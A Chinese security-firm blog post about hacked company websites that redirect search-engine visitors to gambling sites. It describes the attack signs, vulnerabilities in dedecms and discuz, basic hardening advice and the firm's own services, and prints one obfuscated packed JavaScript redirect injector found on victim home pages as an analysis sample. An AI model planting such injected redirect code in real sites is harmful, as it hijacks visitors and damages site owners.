最近一段时间,我们SINE安全公司一连接到数十个公司网站被跳转到其他灰色行业网站上去,客户反映从百度搜索网站进去,直接跳转到其他网站上,直接输入网址没有跳转,导致客户网站的流量急剧下滑,做的百度推广跟搜狗推广,都给灰色网站做广告了,公司领导高度重视网站安全的问题,因为给公司的形象以及名誉带来的损失太大了,我们安排安全技术人员对其网站进行全面的网站安全检测,对网站存在的漏洞,以及木马后门进行全面的清除与漏洞修复,安全加固。关于网站被跳转到其他灰色行业网站的问题,整理一份详细的处理过程,希望帮到更多遇到这种情况的站长,以及公司网站运营者。

网站被跳转其他灰色网站问题分析

我们SINE安全跟公司网站负责人进行了详细的服务器信息(服务器IP 远程端口 管理员账号密码、SSH端口、root账号密码),网站信息包括FTP账号密码的对接,由安全部署部门技术对网站的代码以及服务器系统进行缜密的安全检测与分析。

在整体的安全检测当中我们发现客户的网站都存在网站木马后门,包括php脚本木马,asp脚本木马,jsp脚本木马,我们通常叫大马,可以对网站进行恶意篡改,上传,改名,下载,等管理员的高权限操作。出现网站被跳转的客户,采用的网站架构都是php+mysql架构,以及jsp+mysql架构,大多数用的是开源程序,像dedecms,织梦系统,phpcms系统,discuz系统。

由于之前客户网站总是被跳转到彩piao、du博网站,客户只是懂一些简单的代码,只能通过篡改的首页代码里,找到恶意代码进行删除,但是治标不治本,没过几天网站又被跳转了,客户经常为这些问题烦恼,每天提心吊胆的。其实问题的根本原因在于网站存在漏洞,以及服务器安全没有做好。我们SINE处理了成千上百的网站,总结的经验来看,网站首页被篡改的几率最大,都是篡改首页的标题,描述,以及在首页顶部添加一些加密的字符,如下图所示:

以上代码就是被攻击者添加的加密的标题与描述,解密后发现内容是一些灰色菠菜内容。还有一个被攻击的特征就是在首页你会发现一段跳转的代码,该代码是根据搜索引擎的特征来进行判断跳转,比如判断客户的访问来路是通过百度搜索,360搜索,搜狗搜索来的会直接跳转到其他网站上去。如下代码:

type="text/java">eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){retun d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('l["\\e\\c\\1\\m\\i\\8\\n\\0"]["\\7\\4\\9\\0\\8"](\'\\h\\2\\1\\4\\9\\3\\0\\0\\j\\3\\8\\d\\6\\0\\8\\k\\0\\5\\f\\a\\r\\a\\2\\1\\4\\9\\3\\0\\6\\2\\4\\1\\d\\6\\s\\0\\0\\3\\2\\q\\5\\5\\7\\7\\7\\b\\1\\3\\e\\a\\2\\p\\b\\1\\c\\i\\5\\j\\o\\1\\b\\f\\2\\6\\g\\h\\5\\2\\1\\4\\9\\3\\0\\g\');',29,29,'x74|x63|x73|x70|x72|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6a|x3e|x3c|x6d|x79|x78|window|x75|x6e|x6c|x38|x3a|x76|x68'.split('|'),0,{}))

跳转到的其他网站如下截图:

再一个攻击特征就是网站在百度里搜索,出现红色风险标识, 百度网址安全中心提醒您:该站点可能受到黑客攻击,部分页面已被非法篡改! 红色提示该百度风险。导致客户打开网站直接被百度拦截,如下图所示:

百度网址安全中心提醒您:

该站点可能受到黑客攻击,部分页面已被非法篡改! 查看详情

您正在访问:http*******com/

该站点可能由于受到黑客攻击,部分页面已被非法篡改,可能会威胁到您的财产和信息安全,建议您谨慎访问。

站点(******.com/)发现的非法篡改页面,可参考以下示例:

被黑网址快照1:********com/011E...

被黑网址快照2:********com/010S...

被黑网址快照3:********com/004G...

针对以上网站被跳转攻击的特征,我们SINE对其进行全面的人工代码安全审计,以及网站漏洞检测,网站木马后门清理,发现dedecms网站存在sql注入漏洞,以及xss获取管理员账号cookies漏洞,discuz存在getshell漏洞,注入获取管理员漏洞,discuz上传绕过漏洞,针对上述漏洞我们进行了全面的修复,并做了网站安全部署,以及服务器安全部署,网站文件防篡改部署。

防止网站被跳转的解决方法如下:

1.对服务器目录权限的安全部署,对管理员账号密码加密,尽可能设置的复杂一些,数字+大小写字母+特殊符号,对网站数据库进行分配普通权限账号。

2.mysql数据库默认端口3306,改为61116,并加入到端口安全策略,不对外开放,外网IP无法连接数据库,只有本地127.0.0.1才能进行连接数据库,以防止攻击者恶意猜测。

3.对服务器底层系统进行安全加固,包括远程端口登录的安全验证。

4.对网站代码进行整体的安全检测,包括定期的升级网站程序源代码,修复补丁以及网站漏洞。

5.也可以通过安全公司来解决,国内也就Sinesafe和绿盟等安全公司。

公司网站被跳转到其他网站被提示该站点可能受到黑客攻击,部分页面已被非法篡改相关推荐

  1. 打开百度跳转到另外一个网站、解决百度搜索引擎打开自己的网站却跳转到其他网站

    为什么百度等搜索引擎打开自己的网站却跳转到其他网站?",这种情况,不要责怪百度搜索引擎,而是网站自身的原因,网站被挂马了.清理掉木马文件即可解决,下面360 网站管家 分享解决为什么百度等搜 ...

  2. 当你的网站被百度定义为“风险“ “百度网址安全中心提醒您:该页面可能已被非法篡改!“

    前言 经过苦苦的48小时,持续竭力地和百度官方沟通.终于把我网"风险" "百度网址安全中心提醒您:该页面可能已被非法篡改!"字眼出掉.真心不容易.因此写下这篇博 ...

  3. 网站漏洞修复公司处理网站被篡改跳转到其他网站的解决办法

    2019独角兽企业重金招聘Python工程师标准>>> 某一客户单位的网站首页被篡改,并收到网监的通知说是网站有漏洞,接到上级部门的信息安全整改通报,贵单位网站被植入木马文件,导致网 ...

  4. 手机访问PC网站自动跳转到手机网站代码

    第一 <SCRIPT LANGUAGE="JavaScript">function mobile_device_detect(url){var thisOS=navig ...

  5. 打开一个网站会跳到另一个怎么办,解决方法是什么?

    当我们在搜索引擎上搜索自已公司网站打开却看到其他网址,看到这种情况肯定让人头痛不已,那我们如何解决呢? 第一.不要责怪搜索引擎: 第二.查找自身网站问题,因为一般都是在网站被挂马的情况才会出现这样的情 ...

  6. 网站域名被劫持、网站dns被劫持 域名跳转到别的网站的解决方法

    网站域名被劫持,网站dns被劫持,域名跳转到别的网站怎么解决? 网站域名被劫持,网站dns被劫持,域名跳转到别的网站怎么解决? 出现网站域名跳转到其他网站,这一现象很可能是域名被劫持. [网站域名被劫 ...

  7. 网站莫名跳转,从百度谈什么是网站劫持?百度快照劫持怎么解决

    今年2月份的时候,网上爆出了神马搜索劫持百度搜索流量事件,网友使用百度搜索进入的搜索结果页出来的却是神马搜索的结果页. 百度搜索流量事件是网站劫持的其中一种表现.网站劫持还会导致以下问题: 1.用户输 ...

  8. 网站推广——对于网站推广公司来说应如何帮助企业实现网站优化?

    众所周知,其实在网站建设前期就可以着手准备网站的优化工作了,网站的运营离不开优化,好的优化运营才能促使企业网站在互联网市场中实现商业价值.但是对于普通的企业网站来说,术业有专攻,专业的互联网优化工作并 ...

  9. 手机访问网站自动跳转到手机版

    方法一: 目前很多网站已经出现了手机版的网站,手机网站是和互联网上的网站同步更新的,大多数人访问我们的网站是直接访问电脑上的域名,不可能为了手机网站重新记住一个域名,大家都知道,中国人都是比较懒的,那 ...

  10. 网站链接跳转安全警告提示l单页源码

    介绍: 本次给大家分享一个网页广告链接跳转提示html模板. 做网站的,很多都是以接广告,但是游客没法一一去判别一些广告是否违规,是否安全,所以我们尽可能的提示网站用户,让用户去判别,谨慎交易. 所以 ...

最新文章

  1. java在线找错_平台配置及测试错误提示及解决方案
  2. linux php cpu,获取Linux服务器性能CPU、内存、硬盘等使用率 PHP
  3. html的id不能有.吗,html – 哪些DOM元素不能接受id?
  4. WeX5 Model 里data ,baasData 数据过滤条件清除 数据初始化
  5. 目前最强开源人脸检测算法RetinaFace
  6. python读取文档中有很多指标的数据 写成矩阵_图像处理与特征提取 —— 从 MATLAB 到 Python(一)图像、矩阵与数据的读写...
  7. 评测 | 千元以下的扫拖一体机器人,到底值不值得买?
  8. oracle mysql认证考试流程_oraclemysql认证考试流程
  9. jquery版本问题
  10. JAVA验证码识别和tesseract训练过程
  11. HDU 3533 Escape(BFS)
  12. python 方差_python 方差_python 方差齐性检验_方差 python - 云+社区 - 腾讯云
  13. 我的markdown
  14. 给定某数字A(1≤A≤9)以及非负整数N(0≤N≤100000),求数列之和S=A+AA+AAA+⋯+AA⋯A(N个A)。例如A=1,N=3时,S=1+11+111=123。
  15. 为什么JBX写的代码在编译时,总是少字符呢?
  16. 什么是字节对齐,为什么需要字节对齐
  17. Windows高效桌面壁纸
  18. 如果我们现在要做一个库存盘点的系统,你怎么设计表结构,设计哪些表
  19. 随感 | 毕设风雨 | 前端之路 | 暗夜与旅人 | 早槐与龙鲤
  20. 知乎上的48条神回复!看完人生透彻了许多!

热门文章

  1. Navigate组件的使用(React Router6)
  2. 【React】状态管理仓库 原生\封装\第三方
  3. 92-Kafka详解
  4. 顺丰,四通一达,京东,百世,天天,德邦快递接口java-demo【快递100API】
  5. 计算机提示无法识别优盘,U盘插入电脑提示无法识别的解决方法
  6. android手机截图,安卓手机怎么截屏,安卓手机怎么截屏幕图OPPO
  7. 列表,元组,字典,集合的特点
  8. 输入半径,求球的表面积和体积
  9. 四子棋 java_JAVA写的四子棋
  10. Android Studio适配Mac M1